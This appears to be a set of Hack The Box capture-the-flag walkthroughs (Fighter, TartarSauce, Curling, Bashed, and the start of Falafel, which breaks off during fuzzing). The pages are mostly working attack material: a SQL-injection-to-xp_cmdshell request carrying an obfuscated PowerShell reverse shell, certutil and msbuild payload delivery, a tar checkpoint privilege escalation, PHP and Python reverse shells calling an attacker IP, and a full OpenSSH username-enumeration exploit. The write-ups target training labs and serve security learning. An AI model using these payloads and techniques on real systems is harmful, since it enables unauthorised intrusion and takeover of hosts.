HTB – Fighter

Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the webpage and find that the web application is vulnerable to SQL injection.  We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by npc payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.

sc query capcom

We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check the uid we find that we are successfully able to get administrative rights.

We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “FmfEhO1}h”.

So we create a c program that XOR’s 9 with each character of “FmfEhO1}h”.

We compile and run the file and get the password to be “OdioLaFeta”.

When we provide the password to the root.exe we get our final flag.

With help of Empire

bypass the defender starfighter_xsl from empire by Luis Vacas
For this we are going to develop a small python script that makes us run our .xsl and get empire agent :

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
from requests import *

params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
.
.

Let’s migrate the empire to metasploit:https://github.com/trustedsec/nps_payload (example of use)

1
2
3
cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access the “onuma” directory. So we spawn a tty shell using python to check the sudoers list.We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

We’ll take advantage of the tar options for checkpoints. The --checkpoint=x flag tells tar to take some action every x bytes, as a progress update. The default behavior is to print a status message. However, the --checkpoint-action parameter allows the user to specify what action to take at a check point. So I can have it just give me a shell:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash <ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7

i use pspy for processes detection. here, letting pspy32 run for a bit shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.

Author: Sayantan Bera

HTB – Curling

Today we are going to solve a CTF Challenge “Curling”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. These labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

As these labs are only available online, therefore, they have a static IP. Curling has IP: 10.10.10.59.

Now, as always let’s begin our hacking with the port enumeration.

We see a blog titled “Cewl Curling site!” , and it’s joomla. At this point I would run joomscan but I wanted to do some manual enumeration first , so I checked the source of the page and at the end of the body I found this comment :

So I checked /secret.txt and found this base64 string :

c:\PENTEST>curl http://10.10.10.150/secret.txt
Q3VybGluZzIwMTgh

Decoding :

PS C:\Users\jacco> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q3VybGluZzIwMTgh"))
Curling2018!

Curling2018! we can use that as a password. But what is the username ? If we take a look at the main page again and read the posts :

We will notice a name in one of the posts : Floris , now we can try to login as floris with the password Curling2018! :

And it worked. While I was doing this enumeration I ran wfuzz in the background and got these results :

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.150/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.150/FUZZ
Total requests: 220551

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000007:  C=301      9 L       28 W          313 Ch        "images"
000005:  C=200    361 L     1051 W        14261 Ch        ""
000001:  C=200    361 L     1051 W        14261 Ch        "# directory-list-2.3-medium.txt"
000002:  C=200    361 L     1051 W        14261 Ch        "#"
000003:  C=200    361 L     1051 W        14261 Ch        "# Copyright 2007 James Fisher"
000004:  C=200    361 L     1051 W        14261 Ch        "#"
000071:  C=301      9 L       28 W          312 Ch        "media"
000072:  C=301      9 L       28 W          316 Ch        "templates"
000136:  C=301      9 L       28 W          314 Ch        "modules"
000474:  C=301      9 L       28 W          310 Ch        "bin"
000510:  C=301      9 L       28 W          314 Ch        "plugins"
000629:  C=301      9 L       28 W          315 Ch        "includes"
000861:  C=301      9 L       28 W          315 Ch        "language"
000996:  C=301      9 L       28 W          317 Ch        "components"
001074:  C=301      9 L       28 W          312 Ch        "cache"
001240:  C=301      9 L       28 W          316 Ch        "libraries"
003228:  C=301      9 L       28 W          310 Ch        "tmp"
003538:  C=301      9 L       28 W          314 Ch        "layouts"
005680:  C=301      9 L       28 W          320 Ch        "administrator"
012477:  C=404      9 L       32 W          279 Ch        "axs"
Finishing pending requests...

Also used OpenSSH 2.3 < 7.7 – Username Enumeration (PoC)

root@kali:~/htb/curling# cat 45210.py 
#!/usr/bin/env python

# Copyright (c) 2018 Matthew Daley
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# IN THE SOFTWARE.


import argparse
import logging
import paramiko
import socket
import sys


class InvalidUsername(Exception):
pass


def add_boolean(*args, **kwargs):
pass


old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]

def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)


def userauth_failure(*args, **kwargs):
raise InvalidUsername()


paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
})

logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('hostname', type=str)
arg_parser.add_argument('--port', type=int, default=22)
arg_parser.add_argument('username', type=str)
args = arg_parser.parse_args()

sock = socket.socket()
try:
sock.connect((args.hostname, args.port))
except socket.error:
print '[-] Failed to connect'
sys.exit(1)

transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[-] Failed to negotiate SSH transport'
sys.exit(2)

try:
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print '[*] Invalid username'
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print '[+] Valid username'
root@kali:~/htb/itvitae# pip install paramiko==2.0.8
root@kali:~/htb/itvitae# python 45210.py --p 22 10.10.10.150 floris
/usr/local/lib/python2.7/dist-packages/paramiko/ecdsakey.py:202: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
signature, ec.ECDSA(self.ecdsa_curve.hash_object())
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:110: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
algorithm=hashes.SHA1(),
[+] Valid username

Let’s go to /administrator and login to the administration panel :


Editing Template Files and Getting a Reverse Shell :

On the configuration section there’s an option for templates :

By going to that we notice that protostar is the default style and template :

From templates we will go to Protostar Details and Files and create a new php file :

 

In the php file we will execute a system command to get a reverse shell :

<?php
    system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 443 >/tmp/f');
?>

After we save the file we will go to http://10.10.10.59/templates/protostar/puckie.php

Then we check our listener :

c:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.150: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.150] 55960: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

User

We got a reverse shell as www-data , in the /home directory there’s a directory for floris :

We don’t have read access to user.txt , but we notice a file called password_backup , by looking at that file :

It’s a hex dump file , So I copied it to my box to reverse it :

To reverse a hex dump file we will use xxd , so xxd -r pw_backup :

Not a normal output , let’s redirect the output to a file and see :

So what happened is , it turned out to be a bzip2 file so I decompressed it then got a new gzip file , decompressed it and got another bzip2 file , after decompression I got a tar file , then finally a txt file for the password :

Let’s ssh as floris :

And we owned user !


Curling

By looking at the /home directory of floris again :

There’s a directory called admin-area which contains two files :

input and report

input :

url = "http://127.0.0.1"

report :

It’s obvious that this is the output of executing curl on http://127.0.0.1 :

Even the name of the box is a hint curling , so what about changing that url from localhost to something else like a file ? Next time the command gets executed we will get the contents of that file , maybe root.txt ? But only if it’s getting executed by root. Let’s try and see if it will work :

Then we will do : watch cat report , this is executing cat report every 2 seconds and giving us the output , easier than checking manually :

After some time we get the flag.


Dirty Sock ? Root shell !

I didn’t like the fact that I could only read the flag , I wanted a root shell. So I tried for a long time to bypass the url thing and get a reverse shell , but couldn’t. Then when I did this box again for the write-up , one of the things that caught my attention is that we are on an ubuntu box , so I checked snap version to know if it’s vulnerable to CVE-2019-7304 known as Dirty Sock and of course it was :

This is not intended at all because by the time this box was released , CVE-2019-7304wasn’t disclosed yet.

I got the exploit from here , Then hosted it on a python simple http server and downloaded it on the box :

python3 dirty_sockv2.py 

Now we can su to dirty_sock and execute commands as root :

Or just sudo su and we will get a root shell :

HTB – Bashed

Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

C:\Users\jacco>nmap -sC -sV 10.10.10.68
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time
Nmap scan report for 10.10.10.68
Host is up (0.030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

Next, we use wfuzz to enumerate the directories and found some important directories such as /dev

c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000018: C=404 9 L 32 W 279 Ch "2006"
000019: C=404 9 L 32 W 279 Ch "news"
000013: C=200 161 L 397 W 7745 Ch "#"
000014: C=200 161 L 397 W 7745 Ch ""
000015: C=404 9 L 32 W 280 Ch "index"
000016: C=301 9 L 28 W 311 Ch "images"
000017: C=404 9 L 32 W 283 Ch "download"
000020: C=404 9 L 32 W 280 Ch "crack"
000021: C=404 9 L 32 W 281 Ch "serial"
000022: C=404 9 L 32 W 280 Ch "warez"
000023: C=404 9 L 32 W 279 Ch "full"
000030: C=404 9 L 32 W 277 Ch "11"
Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.68/FUZZ
Total requests: 220560

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt"
000002: C=200 161 L 397 W 7745 Ch "#"
000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher"
000013: C=200 161 L 397 W 7745 Ch "#"
000016: C=301 9 L 28 W 311 Ch "images"
000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts"
000014: C=200 161 L 397 W 7745 Ch ""
000164: C=301 9 L 28 W 312 Ch "uploads"
000338: C=301 9 L 28 W 308 Ch "php"
000550: C=301 9 L 28 W 308 Ch "css"
000834: C=301 9 L 28 W 308 Ch "dev"
000953: C=301 9 L 28 W 307 Ch "js"
002771: C=301 9 L 28 W 310 Ch "fonts"
044769: C=
Finishing pending requests...

So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting through the browser.

After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.

we execute the following command in phpbash

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@bashed:/var/www/html/dev$ cd /home
cd /home
www-data@bashed:/home$ ls
ls
arrexel scriptmanager
www-data@bashed:/home$ cd arrexel
cd arrexel
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
2c2*****fc1
www-data@bashed:/home/arrexel$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py
wget http://10.10.14.20/puckshell.py
--2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py
Connecting to 10.10.14.20:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 213 [text/plain]
Saving to: 'puckshell.py'

puckshell.py 100%[===================>] 213 --.-KB/s in 0s

2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213]
scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py
cp puckshell.py /scripts/puckshell.py
scriptmanager@bashed:~$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 20
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  3 09:43 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager  213 Apr  3 09:43 puckshell.py
-rw-r--r--  1 scriptmanager scriptmanager    0 Apr  2 08:50 test.py
-rw-r--r--  1 scriptmanager scriptmanager   58 Apr  2 08:50 test.py.bak
-rw-r--r--  1 root          root            12 Apr  2 08:50 test.txt
scriptmanager@bashed:/scripts$ cat puckshell.py
cat puckshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$

catch it
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
cc4*****8e2
#

Author: Jacco Straathof

HTB – Falafel

Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

So we explored target IP through the web browser and it put up a login page shown.

Enumeration

With the information we got from robots.txt, let’s brute-force for some .txt files that might give some juicy information

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.

Then we could also fuzz for other usernames

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

